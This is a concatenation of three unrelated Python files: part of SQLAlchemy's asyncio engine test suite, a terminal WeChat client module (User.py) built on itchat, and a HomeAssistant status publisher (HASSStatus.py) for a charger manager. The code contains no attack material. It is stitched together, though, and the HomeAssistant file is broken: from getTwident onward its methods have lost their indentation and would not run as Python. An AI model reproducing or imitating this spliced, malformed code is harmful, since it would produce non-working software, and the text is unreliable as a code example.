        async_engine.clear_compiled_cache()
        assert "foo" not in async_engine.sync_engine._compiled_cache
    def test_execution_options(self, async_engine):
        a2 = async_engine.execution_options(foo="bar")
        assert isinstance(a2, _async_engine.AsyncEngine)
        eq_(a2.sync_engine._execution_options, {"foo": "bar"})
        eq_(async_engine.sync_engine._execution_options, {})
    # Proxied surface covered above:
    #   attrs: uri, pool, dialect, engine, name, driver, echo
    #   methods: clear_compiled_cache, update_execution_options,
    #            execution_options, get_execution_options, dispose
    @async_test
    async def test_proxied_attrs_connection(self, async_engine):
        conn = await async_engine.connect()
        sync_conn = conn.sync_connection
        is_(conn.engine, async_engine)
        is_(conn.closed, sync_conn.closed)
        is_(conn.dialect, async_engine.sync_engine.dialect)
        eq_(conn.default_isolation_level, sync_conn.default_isolation_level)
    @async_test
    async def test_transaction_accessor(self, async_engine):
        async with async_engine.connect() as conn:
            is_none(conn.get_transaction())
            is_false(conn.in_transaction())
            is_false(conn.in_nested_transaction())
            trans = await conn.begin()
            is_true(conn.in_transaction())
            is_false(conn.in_nested_transaction())
            is_(
                trans.sync_transaction, conn.get_transaction().sync_transaction
            )
            nested = await conn.begin_nested()
            is_true(conn.in_transaction())
            is_true(conn.in_nested_transaction())
            is_(
                conn.get_nested_transaction().sync_transaction,
                nested.sync_transaction,
            )
            eq_(conn.get_nested_transaction(), nested)
            is_(
                trans.sync_transaction, conn.get_transaction().sync_transaction
            )
            await nested.commit()
            is_true(conn.in_transaction())
            is_false(conn.in_nested_transaction())
            await trans.rollback()
            is_none(conn.get_transaction())
            is_false(conn.in_transaction())
            is_false(conn.in_nested_transaction())
    @testing.requires.queue_pool
    @async_test
    async def test_invalidate(self, async_engine):
        conn = await async_engine.connect()
        is_(conn.invalidated, False)
        connection_fairy = await conn.get_raw_connection()
        is_(connection_fairy.is_valid, True)
        dbapi_connection = connection_fairy.dbapi_connection
        await conn.invalidate()
        if testing.against("postgresql+asyncpg"):
            assert dbapi_connection._connection.is_closed()
        new_fairy = await conn.get_raw_connection()
        is_not(new_fairy.dbapi_connection, dbapi_connection)
        is_not(new_fairy, connection_fairy)
        is_(new_fairy.is_valid, True)
        is_(connection_fairy.is_valid, False)
    @async_test
    async def test_get_dbapi_connection_raise(self, async_engine):
        conn = await async_engine.connect()
        with testing.expect_raises_message(
            exc.InvalidRequestError,
            "AsyncConnection.connection accessor is not "
            "implemented as the attribute",
        ):
            conn.connection
    @async_test
    async def test_get_raw_connection(self, async_engine):
        conn = await async_engine.connect()
        pooled = await conn.get_raw_connection()
        is_(pooled, conn.sync_connection.connection)
    @async_test
    async def test_isolation_level(self, async_engine):
        conn = await async_engine.connect()
        sync_isolation_level = await greenlet_spawn(
            conn.sync_connection.get_isolation_level
        )
        isolation_level = await conn.get_isolation_level()
        eq_(isolation_level, sync_isolation_level)
        await conn.execution_options(isolation_level="SERIALIZABLE")
        isolation_level = await conn.get_isolation_level()
        eq_(isolation_level, "SERIALIZABLE")
        await conn.close()
    @testing.requires.queue_pool
    @async_test
    async def test_dispose(self, async_engine):
        c1 = await async_engine.connect()
        c2 = await async_engine.connect()
        await c1.close()
        await c2.close()
        p1 = async_engine.pool
        if isinstance(p1, AsyncAdaptedQueuePool):
            eq_(async_engine.pool.checkedin(), 2)
        await async_engine.dispose()
        if isinstance(p1, AsyncAdaptedQueuePool):
            eq_(async_engine.pool.checkedin(), 0)
        is_not(p1, async_engine.pool)
    @testing.requires.independent_connections
    @async_test
    async def test_init_once_concurrency(self, async_engine):
        c1 = async_engine.connect()
        c2 = async_engine.connect()
        # FIX: asyncio.wait() rejects bare awaitables (deprecated in 3.8,
        # TypeError since 3.11); gather() wraps them in Tasks on all
        # supported versions.
        await asyncio.gather(c1, c2)
    @async_test
    async def test_connect_ctxmanager(self, async_engine):
        async with async_engine.connect() as conn:
            result = await conn.execute(select(1))
            eq_(result.scalar(), 1)
    @async_test
    async def test_connect_plain(self, async_engine):
        conn = await async_engine.connect()
        try:
            result = await conn.execute(select(1))
            eq_(result.scalar(), 1)
        finally:
            await conn.close()
    @async_test
    async def test_connection_not_started(self, async_engine):
        conn = async_engine.connect()
        testing.assert_raises_message(
            asyncio_exc.AsyncContextNotStarted,
            "AsyncConnection context has not been started and "
            "object has not been awaited.",
            conn.begin,
        )
    @async_test
    async def test_transaction_commit(self, async_engine):
        users = self.tables.users
        async with async_engine.begin() as conn:
            await conn.execute(delete(users))
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
    @async_test
    async def test_savepoint_rollback_noctx(self, async_engine):
        users = self.tables.users
        async with async_engine.begin() as conn:
            savepoint = await conn.begin_nested()
            await conn.execute(delete(users))
            await savepoint.rollback()
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
    @async_test
    async def test_savepoint_commit_noctx(self, async_engine):
        users = self.tables.users
        async with async_engine.begin() as conn:
            savepoint = await conn.begin_nested()
            await conn.execute(delete(users))
            await savepoint.commit()
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
    @async_test
    async def test_transaction_rollback(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            trans = conn.begin()
            await trans.start()
            await conn.execute(delete(users))
            await trans.rollback()
        async with async_engine.connect() as conn:
            eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
    @async_test
    async def test_conn_transaction_not_started(self, async_engine):
        async with async_engine.connect() as conn:
            trans = conn.begin()
            with expect_raises_message(
                asyncio_exc.AsyncContextNotStarted,
                "AsyncTransaction context has not been started "
                "and object has not been awaited.",
            ):
                # FIX: removed a stray trailing comma that turned this
                # statement into a useless one-element tuple expression.
                await trans.rollback()
    @testing.requires.queue_pool
    @async_test
    async def test_pool_exhausted_some_timeout(self, async_engine):
        engine = create_async_engine(
            testing.db.url,
            pool_size=1,
            max_overflow=0,
            pool_timeout=0.1,
        )
        async with engine.connect():
            with expect_raises(exc.TimeoutError):
                await engine.connect()
    @testing.requires.queue_pool
    @async_test
    async def test_pool_exhausted_no_timeout(self, async_engine):
        engine = create_async_engine(
            testing.db.url,
            pool_size=1,
            max_overflow=0,
            pool_timeout=0,
        )
        async with engine.connect():
            with expect_raises(exc.TimeoutError):
                await engine.connect()
    @async_test
    async def test_create_async_engine_server_side_cursor(self, async_engine):
        testing.assert_raises_message(
            asyncio_exc.AsyncMethodRequired,
            "Can't set server_side_cursors for async engine globally",
            create_async_engine,
            testing.db.url,
            server_side_cursors=True,
        )
class AsyncEventTest(EngineFixture):
    """The engine events all run in their normal synchronous context.
    we do not provide an asyncio event interface at this time.
    """
    __backend__ = True
    @async_test
    async def test_no_async_listeners(self, async_engine):
        # Listening on the async facade objects must be rejected outright.
        with testing.expect_raises_message(
            NotImplementedError,
            "asynchronous events are not implemented "
            "at this time. Apply synchronous listeners to the "
            "AsyncEngine.sync_engine or "
            "AsyncConnection.sync_connection attributes.",
        ):
            event.listen(async_engine, "before_cursor_execute", mock.Mock())
        conn = await async_engine.connect()
        with testing.expect_raises_message(
            NotImplementedError,
            "asynchronous events are not implemented "
            "at this time. Apply synchronous listeners to the "
            "AsyncEngine.sync_engine or "
            "AsyncConnection.sync_connection attributes.",
        ):
            event.listen(conn, "before_cursor_execute", mock.Mock())
    @async_test
    async def test_sync_before_cursor_execute_engine(self, async_engine):
        # Listeners attached to the underlying sync engine do fire.
        canary = mock.Mock()
        event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
        async with async_engine.connect() as conn:
            sync_conn = conn.sync_connection
            await conn.execute(text("select 1"))
        eq_(
            canary.mock_calls,
            [mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
        )
    @async_test
    async def test_sync_before_cursor_execute_connection(self, async_engine):
        canary = mock.Mock()
        async with async_engine.connect() as conn:
            sync_conn = conn.sync_connection
            event.listen(
                async_engine.sync_engine, "before_cursor_execute", canary
            )
            await conn.execute(text("select 1"))
        eq_(
            canary.mock_calls,
            [mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
        )
    @async_test
    async def test_event_on_sync_connection(self, async_engine):
        # Listeners attached to the sync connection also fire.
        canary = mock.Mock()
        async with async_engine.connect() as conn:
            event.listen(conn.sync_connection, "begin", canary)
            async with conn.begin():
                eq_(
                    canary.mock_calls,
                    [mock.call(conn.sync_connection)],
                )
class AsyncInspection(EngineFixture):
    """inspect() is not supported on async facade objects; both engine and
    connection must raise NoInspectionAvailable."""
    __backend__ = True
    @async_test
    async def test_inspect_engine(self, async_engine):
        with testing.expect_raises_message(
            exc.NoInspectionAvailable,
            "Inspection on an AsyncEngine is currently not supported.",
        ):
            inspect(async_engine)
    @async_test
    async def test_inspect_connection(self, async_engine):
        async with async_engine.connect() as conn:
            with testing.expect_raises_message(
                exc.NoInspectionAvailable,
                "Inspection on an AsyncConnection is currently not supported.",
            ):
                inspect(conn)
class AsyncResultTest(EngineFixture):
    """Streaming AsyncResult tests: all()/aiter/partitions/one()/scalars,
    each run plain and through the mappings()/scalars() filters."""
    @testing.combinations(
        (None,), ("scalars",), ("mappings",), argnames="filter_"
    )
    @async_test
    async def test_all(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            if filter_ == "mappings":
                result = result.mappings()
            elif filter_ == "scalars":
                result = result.scalars(1)
            all_ = await result.all()
            if filter_ == "mappings":
                eq_(
                    all_,
                    [
                        {"user_id": i, "user_name": "name%d" % i}
                        for i in range(1, 20)
                    ],
                )
            elif filter_ == "scalars":
                eq_(
                    all_,
                    ["name%d" % i for i in range(1, 20)],
                )
            else:
                eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
    @testing.combinations(
        (None,), ("scalars",), ("mappings",), argnames="filter_"
    )
    @async_test
    async def test_aiter(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            if filter_ == "mappings":
                result = result.mappings()
            elif filter_ == "scalars":
                result = result.scalars(1)
            rows = []
            # async iteration protocol over the streamed result
            async for row in result:
                rows.append(row)
            if filter_ == "mappings":
                eq_(
                    rows,
                    [
                        {"user_id": i, "user_name": "name%d" % i}
                        for i in range(1, 20)
                    ],
                )
            elif filter_ == "scalars":
                eq_(
                    rows,
                    ["name%d" % i for i in range(1, 20)],
                )
            else:
                eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])
    @testing.combinations((None,), ("mappings",), argnames="filter_")
    @async_test
    async def test_keys(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            if filter_ == "mappings":
                result = result.mappings()
            eq_(result.keys(), ["user_id", "user_name"])
            await result.close()
    @async_test
    async def test_unique_all(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(
                union_all(select(users), select(users)).order_by(
                    users.c.user_id
                )
            )
            # unique() collapses the duplicated rows from the UNION ALL
            all_ = await result.unique().all()
            eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
    @async_test
    async def test_columns_all(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            all_ = await result.columns(1).all()
            eq_(all_, [("name%d" % i,) for i in range(1, 20)])
    @testing.combinations(
        (None,), ("scalars",), ("mappings",), argnames="filter_"
    )
    @async_test
    async def test_partitions(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(select(users))
            if filter_ == "mappings":
                result = result.mappings()
            elif filter_ == "scalars":
                result = result.scalars(1)
            check_result = []
            # 19 rows in batches of 5 -> partitions of 5,5,5,4
            async for partition in result.partitions(5):
                check_result.append(partition)
            if filter_ == "mappings":
                eq_(
                    check_result,
                    [
                        [
                            {"user_id": i, "user_name": "name%d" % i}
                            for i in range(a, b)
                        ]
                        for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
                    ],
                )
            elif filter_ == "scalars":
                eq_(
                    check_result,
                    [
                        ["name%d" % i for i in range(a, b)]
                        for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
                    ],
                )
            else:
                eq_(
                    check_result,
                    [
                        [(i, "name%d" % i) for i in range(a, b)]
                        for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
                    ],
                )
    @testing.combinations(
        (None,), ("scalars",), ("mappings",), argnames="filter_"
    )
    @async_test
    async def test_one_success(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(
                select(users).limit(1).order_by(users.c.user_name)
            )
            if filter_ == "mappings":
                result = result.mappings()
            elif filter_ == "scalars":
                result = result.scalars()
            u1 = await result.one()
            if filter_ == "mappings":
                eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
            elif filter_ == "scalars":
                eq_(u1, 1)
            else:
                eq_(u1, (1, "name%d" % 1))
    @async_test
    async def test_one_no_result(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(
                select(users).where(users.c.user_name == "nonexistent")
            )
            with expect_raises_message(
                exc.NoResultFound, "No row was found when one was required"
            ):
                await result.one()
    @async_test
    async def test_one_multi_result(self, async_engine):
        users = self.tables.users
        async with async_engine.connect() as conn:
            result = await conn.stream(
                select(users).where(users.c.user_name.in_(["name3", "name5"]))
            )
            with expect_raises_message(
                exc.MultipleResultsFound,
                "Multiple rows were found when exactly one was required",
            ):
                await result.one()
    @testing.combinations(
        ("scalars",), ("stream_scalars",), argnames="filter_"
    )
    @async_test
    async def test_scalars(self, async_engine, filter_):
        users = self.tables.users
        async with async_engine.connect() as conn:
            if filter_ == "scalars":
                result = (await conn.scalars(select(users))).all()
            elif filter_ == "stream_scalars":
                result = await (await conn.stream_scalars(select(users))).all()
        eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
    """Behavior of the async facade when wrapped around a synchronous
    DBAPI/driver: creation fails, execution raises AwaitRequired, but
    run_sync still works."""
    def test_sync_dbapi_raises(self):
        with expect_raises_message(
            exc.InvalidRequestError,
            "The asyncio extension requires an async driver to be used.",
        ):
            create_async_engine("sqlite:///:memory:")
    @testing.fixture
    def async_engine(self):
        # Force-wrap a sync sqlite engine by faking dialect.is_async.
        engine = create_engine("sqlite:///:memory:", future=True)
        engine.dialect.is_async = True
        return _async_engine.AsyncEngine(engine)
    @async_test
    @combinations(
        lambda conn: conn.exec_driver_sql("select 1"),
        lambda conn: conn.stream(text("select 1")),
        lambda conn: conn.execute(text("select 1")),
        argnames="case",
    )
    async def test_sync_driver_execution(self, async_engine, case):
        with expect_raises_message(
            exc.AwaitRequired,
            "The current operation required an async execution but none was",
        ):
            async with async_engine.connect() as conn:
                await case(conn)
    @async_test
    async def test_sync_driver_run_sync(self, async_engine):
        async with async_engine.connect() as conn:
            res = await conn.run_sync(
                lambda conn: conn.scalar(text("select 1"))
            )
            assert res == 1
            assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
    """Tests for the ReversibleProxy registry: mapping sync objects back to
    their async facades and garbage collection of those facades."""
    @async_test
    async def test_get_transaction(self, async_engine):
        async with async_engine.connect() as conn:
            async with conn.begin() as trans:
                is_(trans.connection, conn)
                is_(conn.get_transaction(), trans)
    @async_test
    async def test_get_nested_transaction(self, async_engine):
        async with async_engine.connect() as conn:
            async with conn.begin() as trans:
                n1 = await conn.begin_nested()
                is_(conn.get_nested_transaction(), n1)
                n2 = await conn.begin_nested()
                is_(conn.get_nested_transaction(), n2)
                await n2.commit()
                is_(conn.get_nested_transaction(), n1)
                is_(conn.get_transaction(), trans)
    @async_test
    async def test_get_connection(self, async_engine):
        async with async_engine.connect() as conn:
            is_(
                AsyncConnection._retrieve_proxy_for_target(
                    conn.sync_connection
                ),
                conn,
            )
    def test_regenerate_connection(self, connection):
        # Retrieving twice for the same sync connection returns one facade.
        async_connection = AsyncConnection._retrieve_proxy_for_target(
            connection
        )
        a2 = AsyncConnection._retrieve_proxy_for_target(connection)
        is_(async_connection, a2)
        is_not(async_connection, None)
        is_(async_connection.engine, a2.engine)
        is_not(async_connection.engine, None)
    @testing.requires.predictable_gc
    @async_test
    async def test_gc_engine(self, testing_engine):
        ReversibleProxy._proxy_objects.clear()
        eq_(len(ReversibleProxy._proxy_objects), 0)
        async_engine = AsyncEngine(testing.db)
        eq_(len(ReversibleProxy._proxy_objects), 1)
        del async_engine
        # facade must drop out of the registry once unreferenced
        eq_(len(ReversibleProxy._proxy_objects), 0)
    @testing.requires.predictable_gc
    @async_test
    async def test_gc_conn(self, testing_engine):
        ReversibleProxy._proxy_objects.clear()
        async_engine = AsyncEngine(testing.db)
        eq_(len(ReversibleProxy._proxy_objects), 1)
        async with async_engine.connect() as conn:
            eq_(len(ReversibleProxy._proxy_objects), 2)
            async with conn.begin() as trans:
                eq_(len(ReversibleProxy._proxy_objects), 3)
            del trans
        del conn
        eq_(len(ReversibleProxy._proxy_objects), 1)
        del async_engine
        eq_(len(ReversibleProxy._proxy_objects), 0)
    def test_regen_conn_but_not_engine(self, async_engine):
        sync_conn = async_engine.sync_engine.connect()
        async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
        async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
        is_(async_conn, async_conn2)
        is_(async_conn.engine, async_engine)
    def test_regen_trans_but_not_conn(self, async_engine):
        sync_conn = async_engine.sync_engine.connect()
        async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
        trans = sync_conn.begin()
        async_t1 = async_conn.get_transaction()
        is_(async_t1.connection, async_conn)
        is_(async_t1.sync_transaction, trans)
        async_t2 = async_conn.get_transaction()
        is_(async_t1, async_t2)
|
User.py | # Authro : ThreeDog
# Data : 2019-05-28
# Function : 将所有的用户、消息相关的操作封装在一个模块中。
# Remark : Users中有一个字典存放所有User,User中有一个队列(list)存放所有消息
import threading
import time
import itchat
from itchat.content import *
from MyCommand import Cmd
from Common import user_type_dict,type_dict,history,minput
from tdinput import register_func,CmdType,td_print,td_flush
from tdinput import set_msg , set_index , has_msg, td_input
from translator import tdtr
class Msg(object):
    # One received message, normalized from an itchat message object.
    def __init__(self,msg,type):
        '''
        Initialize from an itchat message. `type` is "u" for a private
        (friend) message and "r" for a group-chat message.
        '''
        self.createTime = time.strftime("%Y-%m-%d %H:%M:%S",time.localtime(msg.CreateTime)) # creation time
        self.text = msg.Text # message payload
        self.remarkName = ''
        if msg.Type in type_dict: # special-case non-text message types
            self.text = tdtr(type_dict[msg.Type])
        self.text = self.text.replace("\n","\n\033[99999999999999999D") # after each newline the cursor must be moved back to the line start
        # branch on the message kind
        if "u" == type:
            if "NickName" not in msg.User:
                self.nickName = msg.User.UserName
            else :
                self.nickName = msg.User.NickName # sender's nickname
            if "RemarkName" not in msg.User:
                self.remarkName = msg.User.UserName
            else :
                self.remarkName = msg.User.RemarkName # sender's remark name
            self.userName = msg.User.UserName # username: WeChat-side unique id
        elif "r" == type:
            user = Users.instance().getUserByUserName(msg.ActualUserName)
            if user is not None:
                self.remarkName = user.remarkName # sender's remark name
            self.nickName = msg.ActualNickName # sender's nickname
            self.userName = msg.ActualUserName # username: WeChat-side unique id
        else :
            print(tdtr("消息类型参数错误,请重试"))
    def getName(self):
        # Prefer the remark name; fall back to the nickname.
        if self.remarkName == '':
            return self.nickName
        return self.remarkName
class User(object):
    '''
    A user (friend or group chat); each one keeps a queue of unread messages.
    '''
    def __init__(self,*args):
        self.id = args[0] # id
        self.userName = args[1] # unique username assigned by WeChat
        self.nickName = args[2] # nickname
        self.remarkName = args[3] # remark name
        self.type = tdtr(user_type_dict[args[4]]) # type f | r ---> friend | group chat
        self.msgs = []
    def addMsg(self,msg):
        # New messages go to the front; takeMsg pops from the back => FIFO.
        self.msgs.insert(0,msg)
    def takeMsg(self):
        return self.msgs.pop()
    def getName(self):
        # Prefer the remark name; fall back to the nickname.
        if self.remarkName == "":
            return self.nickName
        return self.remarkName
    def hasNewMsg(self): # whether there are unread messages
        if len(self.msgs) == 0:
            return False
        else:
            return True
    def __contains__(self,e): # overload the in / not in operators
        if e in self.nickName or e in self.remarkName:
            return True
        return False
    def __eq__(self,e): # overload ==: users with the same username are considered equal
        if e is None :
            return False
        return e.userName == self.userName
class Users(object):
    '''
    Holds every friend and group chat, and provides all related operations.
    '''
    def __init__(self):
        self.user_count = 0
        self.selfUser = None
        self.user_dict = {}
        self.current_user = None # the user we are currently chatting with
        self.room_dept = -1 # records the boundary id between friends and group chats
        self.cmd = Cmd(self) # command manager owning every console command
        itchat.auto_login(hotReload=True,enableCmdQR = 2,exitCallback=itchat.logout) # log in and persist the session
        threading.Thread(target=itchat.run).start() # run itchat's message loop on a thread
        self.loadUserList(itchat.get_friends(),'f') # load friends
        self.loadUserList(itchat.get_chatrooms(),'r') # load group chats
    @classmethod
    def instance(cls,*args,**kwargs):
        # Lazily-created singleton accessor.
        if not hasattr(Users, "_instance"):
            Users._instance = Users(*args, **kwargs)
        return Users._instance
    def exec(self):
        '''
        Event loop of the user module.
        '''
        try:
            while True:
                print(">>> ",end = '')
                cmd = minput().strip() # read input, trimming surrounding spaces
                if cmd == '': # skip empty input
                    continue
                if cmd == 'exit':
                    itchat.logout()
                    break
                cmd = cmd.split(' ') # split the trimmed command on spaces
                if cmd[0] not in dir(self.cmd):
                    print(tdtr("命令错误,请重试"))
                    continue
                # Dispatch by reflection: the first token must name a Cmd method.
                getattr(self.cmd,cmd[0])(cmd[1:])
        except Exception as e:
            print(e)
            itchat.logout()
    def addUser(self,user,type):
        '''
        Add a single user.
        '''
        new_user = User(self.user_count,user.UserName,user.NickName,user.RemarkName,type)
        self.user_dict[self.user_count] = new_user # key is the id, value is the user
        self.user_count += 1
    def reloadUserList(self):
        '''
        Reload the user lists; refreshes friends/groups added while running.
        '''
        self.selfUser = None
        self.current_user = None
        self.user_dict = {}
        self.user_count = 0
        self.loadUserList(itchat.get_friends(),'f') # load friends
        self.loadUserList(itchat.get_chatrooms(),'r') # load group chats
    def loadUserList(self,users,type='f'):
        '''
        Load a user list; pass 'f' for friends, 'r' for group chats.
        '''
        for user in users:
            self.addUser(user,type)
        self.selfUser = self.user_dict[0]
    def hasNewMsg(self):
        '''
        Whether any message queue is non-empty, i.e. there is unread mail.
        '''
        for user in self.getUsers():
            if user.hasNewMsg() : # a pending message -> True immediately
                return True
        # every queue is empty
        return False
    def getUserByID(self,uid):
        '''
        Look a user up by id.
        '''
        if uid not in self.user_dict:
            return None
        return self.user_dict[uid]
    def getUserByUserName(self,username):
        '''
        Look a user up by WeChat username (the unique id).
        '''
        for user in self.getUsers():
            if user.userName == username:
                return user
        return None
    def getUsers(self):
        '''
        Return all users.
        '''
        return list(self.user_dict.values())
    def handelMsg(self,msg,type):
        '''
        Handle a received message: print it or enqueue it.
        type : 'f' for friend messages, 'r' for group messages
        NOTE(review): callers actually pass 'u' (see recv_msg) rather than
        'f' for friend messages; Msg.__init__ only understands 'u' and 'r'.
        '''
        user = self.getUserByUserName(msg.FromUserName)
        if msg['ToUserName'] == 'filehelper': # messages sent to the file helper get special handling
            user = self.getUserByID(0)
        elif msg['ToUserName'] != self.selfUser.userName: # ignore messages not addressed to us
            return
        elif msg['FromUserName'] == self.selfUser.userName: # ignore our own messages (otherwise messages we send to a group would be queued)
            return
        if msg['FromUserName'] == 'newsapp': # ignore Tencent News messages
            return
        if msg['FromUserName'] == 'filehelper':
            return
        if user is not None:
            m = Msg(msg,type)
            if user == self.current_user: # currently chatting with this user
                if not has_msg(): # input area empty -> print the message directly
                    td_print(("\n\033[99999999999999999D【{}】{} ===> :{}\n\033[99999999999999999D"+tdtr(" 与 {} 聊天中 >>> ")).format(m.createTime,m.getName(),m.text,self.current_user.getName()),end="")
                    td_print("\033[s",end="") # save the cursor position
                else :
                    user.addMsg(m)
            else: # otherwise enqueue it
                user.addMsg(m)
    def sendMsg(self,msg,username):
        # Send `msg` to the WeChat user identified by `username`.
        itchat.send(msg,toUserName=username)
    def ignore(self,arg):
        '''
        Discard unread messages ('all' or a numeric user id).
        '''
        if arg == 'all': # discard every unread message
            print(tdtr("确认忽略所有未读消息吗?y or n"))
            res = td_input()
            if res == 'y' or res == 'yes':
                # discard all queues
                for user in self.getUsers():
                    user.msgs.clear()
            else:
                return
        else:
            try:
                uid = int(arg)
            except Exception :
                print(tdtr("参数错误,请重试"))
                return
            if uid not in self.user_dict:
                print(tdtr("参数错误,请重试"))
                return
            self.getUserByID(uid).msgs.clear()
@itchat.msg_register([TEXT, MAP, CARD, NOTE, SHARING,PICTURE, RECORDING, ATTACHMENT, VIDEO], isGroupChat=True)
def recv_group_msg(msg):
    '''
    Handle a message arriving from a group chat.
    '''
    Users.instance().handelMsg(msg,'r')
@itchat.msg_register([TEXT, MAP, CARD, NOTE, SHARING,PICTURE, RECORDING, ATTACHMENT, VIDEO], isGroupChat=False) # registered callback: runs whenever a private message is received
def recv_msg(msg):
    '''
    Handle a message arriving from a friend.
    '''
    Users.instance().handelMsg(msg,'u')
@register_func(CmdType.CMD_UP)
def up():
    '''
    Up-arrow pressed: display the previous entry of the history list.
    '''
    m = list(history.previous())
    set_msg(m)
    set_index(len(m)) # move the cursor to the end of the recalled text
    td_flush(m)
@register_func(CmdType.CMD_DOWN)
def down():
    '''
    Down-arrow pressed: display the next entry of the history list.
    '''
    m = list(history.next())
    set_msg(m)
    set_index(len(m)) # move the cursor to the end of the recalled text
    td_flush(m)
HASSStatus.py | # HomeAssistant Status Output
# Publishes the provided sensor key and value pair to a HomeAssistant instance
import logging
from ww import f
logger = logging.getLogger(__name__.rsplit(".")[-1])
class HASSStatus:
    # Pushes sensor key/value updates to a HomeAssistant instance.
    # (Class continues beyond this excerpt.)
    # Modules imported in the class body become class attributes, reached
    # later via self.time / self.threading / self.requests.
    import time
    import threading
    import requests
    apiKey = None
    config = None
    configConfig = None
    configHASS = None
    master = None
    msgRateInSeconds = 60  # background flush interval (seconds)
    resendRateInSeconds = 3600  # presumably re-send pacing — TODO confirm use
    retryRateInSeconds = 60  # presumably retry pacing — TODO confirm use
    # NOTE(review): msgQueue is a mutable class attribute; __init__ does not
    # rebind it, so multiple instances would share one queue — confirm intent.
    msgQueue = {}
    status = False
    serverIP = None
    serverPort = 8123
    useHttps = False
    timeout = 2  # HTTP request timeout (seconds)
    backgroundTasksLock = threading.Lock()
    backgroundTasksThread = None
    def __init__(self, master):
        """Read the HASS section of the config; unload the module if it is
        disabled or misconfigured, otherwise start the background sender."""
        self.config = master.config
        self.master = master
        try:
            self.configConfig = self.config["config"]
        except KeyError:
            self.configConfig = {}
        try:
            self.configHASS = self.config["status"]["HASS"]
        except KeyError:
            self.configHASS = {}
        self.status = self.configHASS.get("enabled", False)
        self.serverIP = self.configHASS.get("serverIP", None)
        self.serverPort = self.configHASS.get("serverPort", 8123)
        self.useHttps = self.configHASS.get("useHttps", False)
        self.apiKey = self.configHASS.get("apiKey", None)
        self.msgRateInSeconds = self.configHASS.get("msgRateInSeconds", 60)
        self.resendRateInSeconds = self.configHASS.get("resendRateInSeconds", 3600)
        self.retryRateInSeconds = self.configHASS.get("retryRateInSeconds", 60)
        # Unload if this module is disabled or misconfigured
        if (
            (not self.status)
            or (not self.serverIP)
            or (int(self.serverPort) < 1)
            or (not self.apiKey)
        ):
            self.master.releaseModule("lib.TWCManager.Status", "HASSStatus")
        else:
            # Daemon thread: flushes the message queue until process exit.
            self.backgroundTasksThread = self.threading.Thread(
                target=self.background_task_thread, args=()
            )
            self.backgroundTasksThread.daemon = True
            self.backgroundTasksThread.start()
def getTwident(self, twcid):
# Format TWCID nicely
if len(twcid) == 2:
return "%02X%02X" % (twcid[0], twcid[1])
else:
return str(twcid.decode("utf-8"))
def background_task_thread(self):
while True:
self.time.sleep(self.msgRateInSeconds)
self.backgroundTasksLock.acquire()
for msgKey in self.msgQueue:
msg = self.msgQueue[msgKey]
if msg.elapsingTime < self.time.time():
self.sendingStatusToHASS(msg)
self.backgroundTasksLock.release()
def getSensorName(self, twcid, key_underscore):
return "sensor.twcmanager_" + str(self.getTwident(twcid)) + "_" + key_underscore
def setStatus(self, twcid, key_underscore, key_camelcase, value, unit):
self.backgroundTasksLock.acquire()
sensor = self.getSensorName(twcid, key_underscore)
if (sensor not in self.msgQueue) or (self.msgQueue[sensor].value != value):
self.msgQueue[sensor] = HASSMessage(
self.time.time(),
sensor,
twcid,
key_underscore,
key_camelcase,
value,
unit,
)
self.backgroundTasksLock.release()
def sendingStatusToHASS(self, msg):
http = "http://" if not (self.useHttps) else "https://"
url = http + self.serverIP + ":" + self.serverPort
url = url + "/api/states/" + msg.sensor
headers = {
"Authorization": "Bearer " + self.apiKey,
"content-type": "application/json",
}
try:
logger.log(
logging.INFO8,
f(
"Sending POST request to HomeAssistant for sensor {msg.sensor} (value {msg.value})."
),
)
devclass = ""
if str.upper(msg.unit) in ["W", "A", "V", "KWH"]:
devclass = "power"
if len(msg.unit) > 0:
self.requests.post(
url,
json={
"state": msg.value,
"attributes": {
"unit_of_measurement": msg.unit,
"device_class": devclass,
"friendly_name": "TWC "
+ str(self.getTwident(msg.twcid))
+ " "
+ msg.key_camelcase,
},
},
timeout=self.timeout,
headers=headers,
)
else:
self.requests.post(
url,
json={
"state": msg.value,
"attributes": {
"friendly_name": "TWC "
+ str(self.getTwident(msg.twcid))
+ " "
+ msg.key_camelcase
},
},
timeout=self.timeout,
headers=headers,
)
# Setting elapsing time to now + resendRateInSeconds
self.msgQueue[msg.sensor].elapsingTime = (
self.time.time() + self.resendRateInSeconds
)
except self.requests.exceptions.ConnectionError as e:
logger.log(
logging.INFO4,
"Error connecting to HomeAssistant to publish sensor values",
)
logger.debug(str(e))
self.settingRetryRate(msg)
return False
